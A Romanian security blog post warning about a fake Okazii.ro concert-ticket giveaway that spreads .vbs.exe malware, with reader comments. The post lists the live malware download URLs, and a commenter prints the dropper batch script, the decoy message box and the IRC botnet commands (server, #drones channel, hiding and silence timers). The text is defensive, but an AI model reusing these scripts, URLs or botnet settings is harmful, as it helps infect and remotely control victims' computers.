Circula pe internet o campanie falsa ce se pretinde a fi de la Okazii.ro. Orice ati face, nu dati click pe link.
“Castiga 2 bilete VIP pentru tine si o persoana draga tie la mult asteptatul concert pe care cei de la Bon Jovi il vor sustine in data de 10 iulie 2011, la Bucuresti, in Piata Constitutiei.
Participa acum la tombola organizata de portalul nostru. Razuieste si daca vei gasi codul din 8 cifre vei fi unul din cei 20 de norocosi castigatori ai biletelor puse in joc.
Pentru mai multe detalii despre regulament si cum puteti intra in posesia premiilor, vizitati Okazii.ro.
© 2000 – 2011 okazii.ro“
Link-urile dunt urmatoarele:
http://detroitzoo.org/Okazii.vbs.exe
http://mainspring.tv/razuieste-ma.vbs.exe
http://pageoneprogram.com/razuieste-ma.vbs.exe
http://networkingforprofessionals.com/razuieste-ma.vbs.exe
http://pipit.com/razuieste-ma.vbs.exe
Detectia pe VirusTotal este cam mica:
http://www.virustotal.com/file-scan/report.html?id=379842dc0989….
Devirusare:
Descarcati Dr. Web CureIt si curatati infectiile gasite:
Dr. Web CureIt 6.00.9 Iulie 2011
11 Responses to “Campanie falsa Okazii http://detroitzoo.org/Okazii.vbs.exe”
ATENTIE utilizatori AntiVir, BitDefender, nod32 si Symantec (!?!) – deocamdata nu detecteaza virusul !
Cei ce folosesc F-Secure , Dr.Web si Kaspersky sunt protejati .
multumim de stire:D
Fisierul a fost trimis la analiza.
e un mic remote control:)
userul normal va vedea doar(tutix.vbs):
msgbox “Ne pare rau, dar aceasta incercare a fost Necastigatoare. Va dorim o zi buna in continuare.”,10,”Okazii.ro”
in rest nimic nou: un digstar.bat
@ECHO OFF
regedit /s %SystemRoot%\Temp\Cookies\bestside.reg
START %SystemRoot%\Temp\Cookies\daemon.exe
attrib +H +S %SystemRoot%\Temp\Cookies
START %SystemRoot%\Temp\Cookies\tutix.vbs
se va conecta la un server irc random dint-o lista de 7, primul fiind
n1=FreedomSERVER:irc.darkbit.info:6667GROUP:Freedom
va intra pe canalul #drones
dupa care isi schimba vhostu:
.timer 1 5 mode $me +iwx
.timer 1 7 silence +*!*@*,~*!*@*undernet.org,~*!*@blind.com
asteapta sa primeasca un pm de la cineva cunoscut cu
daca logarea are succes ruleaza fisierul venton.exe (fiind impachetat (upx)va scapa si acesta de unii antivirusi)
Populeaza doar c:\windows\temp\Cookie, deci ar fi suficienta stergerea tuturor fisierelor de aici pt dezinfectare;) inclusiv dir Cookie
Intrucat toate fisierele sunt bifate cu System , Hide.. nu vor fi vizibile userului obisnuit
Multumim pentru detalii si explicatii
@Devirusare – In articolul (din 2 iulie) `Kaspersky Virus Removal Tool 2010` spuneai ca ar fi bine daca si Avira ar avea un astfel de tool – vezi com.3 (poate le treci intr-un articol nou)
Salut.
Ia uite aici:)
http://devirusare.com/2011/03/03/avira-de-cleaner-scaneaza-sistemul-fara-a-instala-avira-devirusare-sistem-cu-avira/
Inca din martie. Pacat ca e in germana.
Da , ai dreptate .
Asa cum am mai spus ar fi bine sa invatam de la nemtii astia (nu doar sa-i admiram) – daca am inteles eu bine site-ul ala este creat prin colaborarea dintre ComputerBild si Federal Office for Information Security (BSI)(o agenţie naţională de securitate IT a guvernului federal german) . Oare la noi ar fi posibil asa ceva ?
La noi ? Cand astia inca mai trag net peste gard si din switch in switch ?
))
Noi suntem praf.
hxxp://pageoneprogram.com/razuieste-ma.vbs.exe
Budapest.HU.EU.Undernet.org:6667
irc.dream.com:6667
Tampa.FL.US.Undernet.org:6667
http://www.virustotal.com/file-scan/report.html?id=4a4b36c25c0463e18deea52d945fa1b806620478b10b498cc397e7ee95064736-1310030572
Inca o versiune din aceeasi categorie
Multumesc.
E bine ca e acelasi fisier si e detectia mare.